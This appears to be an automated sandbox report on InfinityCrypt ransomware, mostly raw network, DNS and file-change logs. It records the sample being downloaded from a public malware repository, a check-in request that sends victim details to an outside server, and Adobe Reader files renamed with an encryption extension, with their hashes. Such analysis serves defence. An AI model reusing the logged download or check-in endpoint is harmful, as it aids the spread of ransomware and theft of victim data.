GET https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parser_esm_js-node_modules_github_bro-a4c183-79f9611c275b.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-6a10dd-e66ebda625fb.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-479802999bcc.jsHTTP Request
GET https://github.githubassets.com/assets/environment-fe7570f3bc38.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_js-9f960d9b217c.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-086f7a27bac0.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_js-c76945c5961a.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_modules_github_markdown-toolbar-e-820fc0-bc8f02b96749.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_details-dialog-elemen-29dc30-a2a71f11a507.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_auto-complete-element_dist_index_js-12366198e7a5.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_js-8fae124883ef.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_remote-inp-b7d8f4-8cd02f324209.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_primer_view-co-edcaff-3c8d982e3513.jsHTTP Request
GET https://github.githubassets.com/assets/github-elements-2cfb51438f96.jsHTTP Request
GET https://github.githubassets.com/assets/element-registry-54ada9578c04.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_modules_github_hydro-analytics-client_-978abc0-add939c751ce.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_github_alive-client_dist-bf5aa2-1b562c29ab8e.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-5bff297a06de.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c91f4ad18b62.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_scroll-anchoring_dist_scro-231ccf-aa129238d13b.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-node_modules_github_jtml_lib_index_js-95b84ee6bc34.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-node_modules_github_quote-select-cbac5f-5c15271fc07d.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_updatable-content_ts-ee3fc84d7fb0.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_task-list_ts-app_assets_modules_github_onfocus_ts-app_ass-421cec-9de4213015af.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_sticky-scroll-into-view_ts-b0257485d817.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_ajax-error_ts-app_assets_modules_github_behaviors_include-467754-f9bd433e9591.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235-9285faa0e011.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_blob-anchor_ts-app_assets_modules_github_filter-sort_ts-app_assets_-c96432-da3733f430b8.jsHTTP Request
GET https://github.githubassets.com/assets/behaviors-95fb377bbf8b.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modules_github_catalyst_lib_index_js-d0256ebff5cd.jsHTTP Request
GET https://github.githubassets.com/assets/notifications-global-352d84c6cc82.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_virtualized-list_es_index_js-node_modules_github_template-parts_lib_index_js-878844713bc9.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-c537341-c7f6a41a084c.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_github_ref-selector_ts-b593b93f23f5.jsHTTP Request
GET https://github.githubassets.com/assets/codespaces-1a8626dd714a.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_js-node_modules_github_mini-throt-08ab15-3e0517baca99.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_index_js-node_modules_github_mini-th-55cf52-e14cb4b719b4.jsHTTP Request
GET https://github.githubassets.com/assets/repositories-69068e0899f9.jsHTTP Request
GET https://github.githubassets.com/assets/code-menu-614feb194539.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_js-node_modules_primer_react_lib--23bcad-e3a267112490.jsHTTP Request
GET https://github.githubassets.com/assets/keyboard-shortcuts-dialog-bcc338063768.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_modules_delegated-events_dist_inde-94fd67-99519581d0f8.jsHTTP Request
GET https://github.githubassets.com/assets/sessions-585a7232e50a.jsHTTP Request
GET https://github.githubassets.com/assets/react-lib-1fbfc5be2c18.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-node_modules_primer_react_lib-es-2e8e7c-b299afe58dd7.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-ebfceb11fb57.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-0528cb519251.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js-e001d0eead25.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-node_modules_primer_react_lib-es-fa1130-8d276499c3fb.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_modules_primer_react_lib-esm_Text-85a14b-249efa9c2fae.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMenu_js-a3c61ff6363e.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_react-router-dom_dist_index_js-3b41341d50fe.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_js-node_modules_primer_react_lib-esm_Label_L-857e1c-55e35df302fc.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_UnderlineNav_index_js-68debb3ba7c5.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_AvatarStack_AvatarStack_js-node_modules_primer_reac-e445e7-1d24d526a610.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_react-core_AppContextProvider_ts-809ab9-bbdd92837dd6.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_paths_index_ts-c3cc12d2cf9c.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-dbbdef4348e2.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-checks-status_index_ts-ui_packages-a73d65-1f7b49ebbee5.jsHTTP Request
GET https://github.githubassets.com/assets/app_assets_modules_react-code-view_components_directory_DirectoryContent_index_ts-app_assets_-36a91e-abc84050813d.jsHTTP Request
GET https://github.githubassets.com/assets/repos-overview-96a53de79471.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/chunk-app_components_primer_experimental_toggle-switch-element_ts-7c5e7b04edd6.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-vendors-node_modules_github_hydro-analytics-client_dist_analytics-client_js-node_modules_gith-ffadee0-5cdb6954f6de.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-app_components_search_custom-scopes-element_ts-f5230254d82b.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_delegated-events_dist_in-f11236-50158068cc10.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-app_assets_modules_github_jump-to_ts-2641544048b8.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-app_assets_modules_github_onfocus_ts-app_components_search_qbsearch-input-element_ts-ui_packa-52ba59-c843a9042665.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-element_cookie-consent-element_ts-6c210391e8f0.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_cookie-consent-link-element_cookie-consent-link-element_ts-80fd8ee00406.jsHTTP Request
GET https://github.githubassets.com/assets/ui_packages_query-builder-element_query-builder-element_ts-5fadb36426c7.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_trusted-types-policies_policy_ts-ui_packages_trusted-types_trusted-types_ts-node_-38f8f1-5c4d940a245a.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/chunk-ui_packages_webauthn-get-element_webauthn-get-element_ts-57f9943adb92.jsHTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/chunk-app_assets_modules_react-code-view_components_file-tree_FileResultsList_tsx-5a7f3e39812d.jsHTTP Request
GET https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-7ef3071b711c.jsHTTP Response
200HTTP Response
200 -
989 B 4.7kB 9 10
-
989 B 4.7kB 9 10
-
989 B 4.7kB 9 10
-
989 B 4.7kB 9 10
-
989 B 4.7kB 9 10
-
185.199.108.133:443https://avatars.githubusercontent.com/u/44542704?v=4&size=40tls, http2msedge.exe3.7kB 28.4kB 43 50
HTTP Request
GET https://avatars.githubusercontent.com/u/44542704?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/42248228?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/63458929?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/51242428?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/39349444?s=64&v=4HTTP Request
GET https://avatars.githubusercontent.com/u/17717494?s=64&v=4HTTP Request
GET https://camo.githubusercontent.com/3d2ea4e5e42309c07e7ffa02a58730c989e09d2c4ebe4e9f50651d327cdc2cd1/68747470733a2f2f6d616c7761742e63682f696d616765732f6173736574732f6d616c77617265436f6c6c656374696f6e2e706e67HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
502HTTP Request
GET https://avatars.githubusercontent.com/u/44542704?v=4&size=40HTTP Response
200 -
1.0kB 4.7kB 11 9
-
1.0kB 4.7kB 11 9
-
1.0kB 4.7kB 11 9
-
1.0kB 4.7kB 11 9
-
977 B 4.6kB 10 8
-
6.1kB 6.8kB 24 23
HTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Request
POST https://collector.github.com/github/collectHTTP Response
204HTTP Response
204HTTP Response
204 -
885 B 4.3kB 8 5
-
2.7kB 23.2kB 32 35
HTTP Request
GET https://github.githubassets.com/favicons/favicon.svgHTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/apple-touch-icon-144x144-b882e354c005.pngHTTP Request
GET https://github.githubassets.com/favicons/favicon.pngHTTP Response
200HTTP Response
200 -
61.8kB 7.2kB 61 48
HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200 -
140.82.121.10:443https://codeload.github.com/Endermanch/MalwareDatabase/zip/refs/heads/mastertls, http2msedge.exe4.2MB 230.2MB 90606 164807
HTTP Request
GET https://codeload.github.com/Endermanch/MalwareDatabase/zip/refs/heads/masterHTTP Response
200 -
3.5kB 5.6kB 19 18
HTTP Request
POST https://collector.github.com/github/collectHTTP Response
204 -
2.3kB 4.8kB 17 16
HTTP Request
POST https://api.github.com/_private/browser/statsHTTP Response
200 -
162.55.0.137:80http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CJMzWoxXx1MeVxXxjM5gxXxpWOkxXxLil7xXxP5tbxXx%7CMicrosoft%20Windows%2010%20Pro%7C67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F%7C3193httpEndermanch@InfinityCrypt.exe1.1kB 7.9kB 14 9
HTTP Request
GET http://arizonacode.bplaced.net/rnsm/add.php?type=add&data=InfinityCrypt%7CAdmin%7CJMzWoxXx1MeVxXxjM5gxXxpWOkxXxLil7xXxP5tbxXx%7CMicrosoft%20Windows%2010%20Pro%7C67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F%7C3193HTTP Response
403 -
2.20.37.224:443https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktoptls, http21.5kB 9.5kB 20 18
HTTP Request
GET https://cxcs.microsoft.net/api/settings/en-US/xml/settings-tipset?release=20h1&sku=Professional&platform=desktopHTTP Response
200 -
92.123.128.174:443https://www.bing.com/RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-UStls, http215.5kB 13.7kB 51 50
HTTP Request
POST https://www.bing.com/RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-USHTTP Response
200HTTP Request
POST https://www.bing.com/RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-USHTTP Response
200HTTP Request
POST https://www.bing.com/RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-USHTTP Response
200HTTP Request
POST https://www.bing.com/RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-USHTTP Response
200HTTP Request
POST https://www.bing.com/RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-USHTTP Response
200HTTP Request
POST https://www.bing.com/RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-USHTTP Response
200HTTP Request
POST https://www.bing.com/RelatedSearch?addfeaturesnoexpansion=relatedsearch&mkt=en-USHTTP Response
200 -
1.8kB 7.9kB 15 17
HTTP Request
GET https://contile.services.mozilla.com/v1/tiles -
1.6kB 5.6kB 15 15
-
2.2kB 3.7kB 10 9
-
1.9kB 4.5kB 12 12
HTTP Request
GET https://push.services.mozilla.com/HTTP Response
101 -
34.149.100.209:443https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-UStls, http2firefox.exe1.8kB 4.5kB 14 13
HTTP Request
GET https://firefox.settings.services.mozilla.com/v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US -
-
-
70 B 156 B 1 1
DNS Request
9.228.82.20.in-addr.arpa
-
56 B 158 B 1 1
DNS Request
g.bing.com
DNS Response
204.79.197.20013.107.21.200
-
72 B 137 B 1 1
DNS Request
173.178.17.96.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
41.110.16.96.in-addr.arpa
-
73 B 107 B 1 1
DNS Request
203.33.253.131.in-addr.arpa
-
453 B 7
-
73 B 139 B 1 1
DNS Request
152.128.123.92.in-addr.arpa
-
57 B 318 B 1 1
DNS Request
th.bing.com
DNS Response
92.123.128.16992.123.128.17792.123.128.17292.123.128.16892.123.128.16792.123.128.17092.123.128.17692.123.128.17492.123.128.166
-
56 B 316 B 1 1
DNS Request
r.bing.com
DNS Response
92.123.128.13992.123.128.19492.123.128.14092.123.128.13392.123.128.19592.123.128.14492.123.128.13292.123.128.13492.123.128.142
-
73 B 139 B 1 1
DNS Request
139.128.123.92.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
169.128.123.92.in-addr.arpa
-
71 B 306 B 1 1
DNS Request
login.microsoftonline.com
DNS Response
20.190.181.240.126.53.1620.190.181.140.126.53.1820.190.181.640.126.53.2120.190.181.420.190.181.5
-
67 B 152 B 1 1
DNS Request
services.bingapis.com
DNS Response
13.107.5.80
-
71 B 157 B 1 1
DNS Request
2.181.190.20.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
80.5.107.13.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
19.177.190.20.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
157.123.68.40.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
18.134.221.88.in-addr.arpa
-
66 B 82 B 1 1
DNS Request
sosafe-awareness.com
DNS Response
162.159.135.42
-
134 B 187 B 2 1
DNS Request
consent.cookiebot.com
DNS Request
consent.cookiebot.com
DNS Response
23.48.165.14123.48.165.152
-
60 B 140 B 1 1
DNS Request
js.hsforms.net
DNS Response
104.16.139.206104.16.136.206104.16.140.206104.16.137.206104.16.138.206
-
73 B 135 B 1 1
DNS Request
42.135.159.162.in-addr.arpa
-
62 B 126 B 1 1
DNS Request
cdn.matomo.cloud
DNS Response
13.225.239.11513.225.239.11213.225.239.513.225.239.91
-
63 B 143 B 1 1
DNS Request
forms.hsforms.com
DNS Response
104.18.160.125104.18.176.125104.17.239.249104.18.192.125104.17.207.249
-
72 B 105 B 1 1
DNS Request
97.203.85.209.in-addr.arpa
-
73 B 131 B 1 1
DNS Request
115.239.225.13.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
141.165.48.23.in-addr.arpa
-
72 B 129 B 1 1
DNS Request
42.239.225.13.in-addr.arpa
-
73 B 135 B 1 1
DNS Request
206.139.16.104.in-addr.arpa
-
70 B 175 B 1 1
DNS Request
consentcdn.cookiebot.com
DNS Response
104.84.69.31
-
74 B 122 B 1 1
DNS Request
sosafeawareness.matomo.cloud
DNS Response
18.195.235.1893.126.133.16918.157.122.248
-
67 B 147 B 1 1
DNS Request
forms-na1.hsforms.com
DNS Response
104.17.239.249104.18.160.125104.17.207.249104.18.192.125104.18.176.125
-
66 B 164 B 1 1
DNS Request
imgsct.cookiebot.com
DNS Response
104.84.69.31
-
126 B 143 B 2 1
DNS Request
js.hsadspixel.net
DNS Request
js.hsadspixel.net
DNS Response
104.17.231.163104.17.229.163104.17.228.163104.17.227.163104.17.230.163
-
120 B 156 B 2 1
DNS Request
www.google.com
DNS Request
www.google.com
DNS Response
74.125.193.14774.125.193.9974.125.193.10374.125.193.10674.125.193.10474.125.193.105
-
136 B 122 B 2 1
DNS Request
cdn.requestmetrics.com
DNS Request
cdn.requestmetrics.com
DNS Response
143.244.38.136
-
116 B 162 B 2 1
DNS Request
bat.bing.com
DNS Request
bat.bing.com
DNS Response
204.79.197.20013.107.21.200
-
120 B 164 B 2 1
DNS Request
snap.licdn.com
DNS Request
snap.licdn.com
DNS Response
88.221.134.13688.221.135.105
-
73 B 137 B 1 1
DNS Request
googleads.g.doubleclick.net
DNS Response
209.85.202.154209.85.202.157209.85.202.156209.85.202.155
-
64 B 165 B 1 1
DNS Request
apps.identrust.com
DNS Response
96.17.179.20596.17.179.184
-
65 B 145 B 1 1
DNS Request
js.hs-analytics.net
DNS Response
104.16.80.186104.16.78.186104.16.76.186104.16.79.186104.16.77.186
-
3.3kB 7.8kB 9 11
-
124 B 78 B 2 1
DNS Request
www.google.co.uk
DNS Request
www.google.co.uk
DNS Response
172.253.116.94
-
73 B 135 B 1 1
DNS Request
125.160.18.104.in-addr.arpa
-
73 B 140 B 1 1
DNS Request
189.235.195.18.in-addr.arpa
-
71 B 135 B 1 1
DNS Request
31.69.84.104.in-addr.arpa
-
73 B 135 B 1 1
DNS Request
249.239.17.104.in-addr.arpa
-
73 B 116 B 1 1
DNS Request
136.38.244.143.in-addr.arpa
-
73 B 132 B 1 1
DNS Request
147.193.125.74.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
187.178.17.96.in-addr.arpa
-
73 B 135 B 1 1
DNS Request
163.231.17.104.in-addr.arpa
-
73 B 107 B 1 1
DNS Request
154.202.85.209.in-addr.arpa
-
73 B 139 B 1 1
DNS Request
136.134.221.88.in-addr.arpa
-
72 B 137 B 1 1
DNS Request
205.179.17.96.in-addr.arpa
-
73 B 106 B 1 1
DNS Request
94.116.253.172.in-addr.arpa
-
67 B 147 B 1 1
DNS Request
js-na1.hs-scripts.com
DNS Response
104.16.187.89104.16.190.89104.16.189.89104.16.188.89104.16.191.89
-
63 B 95 B 1 1
DNS Request
track.hubspot.com
DNS Response
104.19.154.83104.19.155.83
-
62 B 94 B 1 1
DNS Request
js.hs-banner.com
DNS Response
172.64.153.27104.18.34.229
-
65 B 168 B 1 1
DNS Request
px.ads.linkedin.com
DNS Response
13.107.42.14
-
120 B 140 B 2 1
DNS Request
api.hubapi.com
DNS Request
api.hubapi.com
DNS Response
104.17.204.204104.17.202.204104.17.200.204104.17.203.204104.17.201.204
-
72 B 134 B 1 1
DNS Request
186.80.16.104.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
89.187.16.104.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
83.154.19.104.in-addr.arpa
-
72 B 134 B 1 1
DNS Request
27.153.64.172.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
14.42.107.13.in-addr.arpa
-
67 B 99 B 1 1
DNS Request
in.requestmetrics.com
DNS Response
51.161.119.9251.161.119.93
-
73 B 135 B 1 1
DNS Request
204.204.17.104.in-addr.arpa
-
144 B 226 B 2 2
DNS Request
92.119.161.51.in-addr.arpa
DNS Request
92.119.161.51.in-addr.arpa
-
56 B 72 B 1 1
DNS Request
github.com
DNS Response
140.82.121.4
-
69 B 133 B 1 1
DNS Request
github.githubassets.com
DNS Response
185.199.108.154185.199.109.154185.199.110.154185.199.111.154
-
75 B 139 B 1 1
DNS Request
avatars.githubusercontent.com
DNS Response
185.199.108.133185.199.109.133185.199.110.133185.199.111.133
-
75 B 253 B 1 1
DNS Request
github-cloud.s3.amazonaws.com
DNS Response
3.5.28.183.5.11.10552.217.167.1752.216.217.4952.217.173.5754.231.199.24152.216.93.19552.216.43.113
-
79 B 143 B 1 1
DNS Request
user-images.githubusercontent.com
DNS Response
185.199.108.133185.199.109.133185.199.110.133185.199.111.133
-
72 B 136 B 1 1
DNS Request
camo.githubusercontent.com
DNS Response
185.199.110.133185.199.111.133185.199.109.133185.199.108.133
-
71 B 115 B 1 1
DNS Request
4.121.82.140.in-addr.arpa
-
74 B 118 B 1 1
DNS Request
154.108.199.185.in-addr.arpa
-
74 B 118 B 1 1
DNS Request
133.108.199.185.in-addr.arpa
-
66 B 115 B 1 1
DNS Request
collector.github.com
DNS Response
140.82.112.22
-
60 B 76 B 1 1
DNS Request
api.github.com
DNS Response
140.82.121.5
-
72 B 117 B 1 1
DNS Request
22.112.82.140.in-addr.arpa
-
71 B 115 B 1 1
DNS Request
5.121.82.140.in-addr.arpa
-
65 B 81 B 1 1
DNS Request
codeload.github.com
DNS Response
140.82.121.10
-
72 B 117 B 1 1
DNS Request
10.121.82.140.in-addr.arpa
-
70 B 156 B 1 1
DNS Request
25.73.42.20.in-addr.arpa
-
60 B 76 B 1 1
DNS Request
api.github.com
DNS Response
140.82.121.6
-
66 B 115 B 1 1
DNS Request
collector.github.com
DNS Response
140.82.112.22
-
71 B 115 B 1 1
DNS Request
6.121.82.140.in-addr.arpa
-
138 B 170 B 2 2
DNS Request
arizonacode.bplaced.net
DNS Request
arizonacode.bplaced.net
DNS Response
162.55.0.137
DNS Response
162.55.0.137
-
71 B 99 B 1 1
DNS Request
137.0.55.162.in-addr.arpa
-
64 B 154 B 1 1
DNS Request
cxcs.microsoft.net
DNS Response
2.20.37.224
-
73 B 139 B 1 1
DNS Request
174.128.123.92.in-addr.arpa
-
70 B 133 B 1 1
DNS Request
224.37.20.2.in-addr.arpa
-
74 B 90 B 1 1
DNS Request
contile.services.mozilla.com
DNS Response
34.117.237.239
-
81 B 235 B 1 1
DNS Request
content-signature-2.cdn.mozilla.net
DNS Response
34.160.144.191
-
74 B 90 B 1 1
DNS Request
contile.services.mozilla.com
DNS Response
34.117.237.239
-
103 B 119 B 1 1
DNS Request
prod.content-signature-chains.prod.webservices.mozgcp.net
DNS Response
34.160.144.191
-
74 B 155 B 1 1
DNS Request
contile.services.mozilla.com
-
103 B 131 B 1 1
DNS Request
prod.content-signature-chains.prod.webservices.mozgcp.net
DNS Response
2600:1901:0:92a9::
-
73 B 157 B 1 1
DNS Request
shavar.services.mozilla.com
DNS Response
44.239.242.5744.237.149.21354.218.225.239
-
71 B 125 B 1 1
DNS Request
push.services.mozilla.com
DNS Response
34.107.243.93
-
70 B 86 B 1 1
DNS Request
autopush.prod.mozaws.net
DNS Response
34.107.243.93
-
68 B 116 B 1 1
DNS Request
shavar.prod.mozaws.net
DNS Response
44.237.149.21344.239.242.5754.218.225.239
-
70 B 155 B 1 1
DNS Request
autopush.prod.mozaws.net
-
68 B 153 B 1 1
DNS Request
shavar.prod.mozaws.net
-
83 B 161 B 1 1
DNS Request
firefox.settings.services.mozilla.com
DNS Response
34.149.100.209
-
94 B 110 B 1 1
DNS Request
prod.remote-settings.prod.webservices.mozgcp.net
DNS Response
34.149.100.209
-
94 B 187 B 1 1
DNS Request
prod.remote-settings.prod.webservices.mozgcp.net
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\icudtl.dat.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F
Filesize16B
MD5aee6f1606fe2459626e004ef53ed31aa
SHA13d124bca14298d31192a944bc35fe6e9e7b39eac
SHA25612562642a75426dd572483b4c230786fe3c58eb2b79be17481c4a4d407966100
SHA512a2feb757d5bb884113d637e23f43710cf5259a930b3be606cef162c405b50895ee6e09310bebf87cbf41d85bfe13ccd0f0b862574ef0eb642bf8ff73d19ef182
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_remove_18.svg.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F
Filesize720B
MD5b1ba5504e1dd7e73d6d8f6c7a9fcb395
SHA14afac781e00caae8b97cc2a0df23ff1f70b25807
SHA256f837d115167561cc62cd072ebb1d46ee6c27f449f74bc6ea2ce906f36aeb2f98
SHA512612e82ca1c5d0b9617a7be13c46509ea988c65e51b8c04649a393111929f4302ebb7ebde5c0d8d89ef4029204093cff605058703c5379f90ff9339856a71cef0
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons.png.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F
Filesize688B
MD59ce84629e2ef69c4a7d3616943ade25f
SHA188ab3b7b14f6751a570227600a75e01653a36e50
SHA25661ba13e50c9e2e0b756c8d9a231cbbb826527ddf2ecf8aadf5890b8c88874024
SHA512dca7c69e5c20563367b3cd13c90c142d0a4b2c8648d2c4032cffbc37344c4f94a873cc98742ffc9795815ad27dc43c5943ccefb1ec0401139f449b8ac814a060
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\example_icons2x.png.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F
Filesize1KB
MD5b9d08fe0a6bddf79c70f5c3538c97f09
SHA162e95a93e3b4b321a43e7626fa57122181b71f1b
SHA256a11cf1c8e763f5ce279c8a5a6f80c423c20ef293ca6bf5fed8e18e9e3a10c128
SHA512309137bb5724c4cb322d43a7a7f9a273ad181a66022cf5df17027b896a1d81f049ba692d3ee4ec51b95cf74bb7b10641a654e776971e09b3a790df1645c44fec
-
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\rhp_world_icon.png.67D2B1B89C2585D2EE67B417B476F92EA0D26D9FDAE7330325B07A2B54FBD49F
Filesize448B
MD5a01f96f931c14a843562d3d9ce0ebb4c
SHA152d66eca6b9c99692385d973926ba137392d60f4
